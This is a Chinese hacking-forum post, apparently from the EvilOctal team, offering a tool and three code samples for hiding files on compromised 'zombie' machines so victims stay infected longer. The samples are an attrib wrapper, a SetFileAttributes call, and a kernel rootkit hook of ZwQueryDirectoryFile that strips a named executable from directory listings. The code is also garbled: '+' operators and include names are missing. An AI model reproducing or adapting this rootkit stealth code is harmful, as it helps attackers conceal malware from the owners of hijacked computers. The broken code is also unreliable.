文章作者:永恒无月 信息来源:邪恶八进制信息安全团队 呵呵~~我写的一个可以隐藏任何文件的小冬冬,就算选了显示所有文件也看不到哦!在DOS里可访问(说明还在),但用DEL或DIR命令都无效哦!^_^给大家在肉机上玩玩吧,说不定(我说一定~)会让你的肉鸡晚飞几天(N久~),呵呵,有点自大了,发407070565@qq.com来骂我。 小玩意,下载地址:http://bbs.shop366.com/NOFILE.rar 以下是EvilOctal编辑添加内容: 冰血封情的仿照代码: Code: //Creditz Bideyore[E.S.T] and EvilOctal[E.S.T] #include #include #include int main(int argv, char* argc[]) { char string[256]; if( argv < 2 ) { fprintf(stderr, "Proper Usage is: \n"); fprintf(stderr, "%s filename: \n", argc[0]); return (1); } strcpy(string, "attrib s h "); int stringl = strlen(argc[1]) strlen(string); if (stringl > 255) { fprintf(stderr, "ERROR!\n"); exit(1); } char * output = strcat(string, argc[1]); system(output); return 0; } [Ctrl A select All] 下面是Swords的方法: Code: #include int main(int argv,char *argc[]){ SetFileAttributes(argc[1],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM); } [Ctrl A select All] 下面是dahubaobao的代码: Code: NTSTATUS NewZwQueryDirectoryFile ( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN ReturnOnlyOneEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartQuery) { NTSTATUS ntStatus=STATUS_SUCCESS; LPFILE_NAMES_INFORMATION FileCurr=NULL; LPFILE_NAMES_INFORMATION FilePrev=NULL; UNICODE_STRING FileNameWide={0}; ANSI_STRING FileNameAnsi={0}; ULONG FileNameLength=0; BOOLEAN LastOne; int Pos=0,Left=0; KeAcquireSpinLock(&SpinLock,&Irql); //请求原函数 ntStatus=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) ( hFile,hEvent,IoApcRoutine,IoApcContext, pIoStatusBlock,FileInformationBuffer, FileInformationBufferLength,FileInfoClass, ReturnOnlyOneEntry,FileName,RestartQuery); if (NT_SUCCESS(ntStatus) && (FileInfoClass==3) { //指向文件列表缓冲区 if ((FileCurr=(LPFILE_NAMES_INFORMATION)FileInformationBuffer)==NULL) return ntStatus; do { LastOne=!(FileCurr->NextEntryOffset); //取偏移 FileNameLength=FileCurr->FileNameLength; //取长度 RtlInitUnicodeString(&FileNameWide,FileCurr->FileName); RtlUnicodeStringToAnsiString(&FileNameAnsi,&FileNameWide,TRUE); if (_strnicmp("test.exe",FileNameAnsi.Buffer,(FileNameLength / 2))==0) { //最后一个文件 if (LastOne) { if (FileCurr==(LPFILE_NAMES_INFORMATION)FileInformationBuffer) ntStatus=STATUS_NO_MORE_FILES; //隐藏 else FilePrev->NextEntryOffset=0; } else { //移动文件偏移 Pos=((ULONG)FileCurr)-((ULONG)FileInformationBuffer); Left=(ULONG)FileInformationBufferLength-Pos-FileCurr->NextEntryOffset; //覆盖缓冲 RtlCopyMemory((PVOID)FileCurr,(PVOID)((char *)FileCurr FileCurr->NextEntryOffset),(DWORD)Left); continue; } } //下一文件 FilePrev=FileCurr; FileCurr=(LPFILE_NAMES_INFORMATION)((char *)FileCurr FileCurr->NextEntryOffset); }while (!LastOne); } if (FileNameAnsi.Buffer) RtlFreeAnsiString(&FileNameAnsi); KeReleaseSpinLock(&SpinLock,Irql); return ntStatus; } [Ctrl A select All] |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-29 23:24 , Processed in 0.222690 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.